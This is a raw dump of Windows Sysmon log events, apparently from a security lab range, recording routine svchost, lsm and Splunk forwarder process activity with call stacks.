22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+16e05|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362647Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+168ca|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362646Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+1679b|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362645Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+16e05|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362644Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+168ca|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362643Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+1679b|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362642Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+11658|c:\windows\system32\tokenbroker.dll+11366|c:\windows\system32\tokenbroker.dll+13f74|c:\windows\system32\tokenbroker.dll+1571d|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8 10341000x8000000000000000362641Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+11658|c:\windows\system32\tokenbroker.dll+15c25|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362640Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+15323|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000362639Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7a02-000000001100}5156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362638Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+16e05|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362637Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+168ca|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362636Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+1679b|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362635Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.474{8e433fbf-3782-6013-ca03-000000001100}932010200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362634Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3782-6013-ca03-000000001100}9320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362633Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362632Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362631Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362630Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362629Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-3782-6013-ca03-000000001100}9320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362628Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.318{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3782-6013-ca03-000000001100}9320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362627Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.319{8e433fbf-3782-6013-ca03-000000001100}9320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033152Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.146{FF16AF91-3782-6013-9003-00000000A401}61524072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033151Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.005{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3782-6013-9003-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033150Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.005{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033149Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 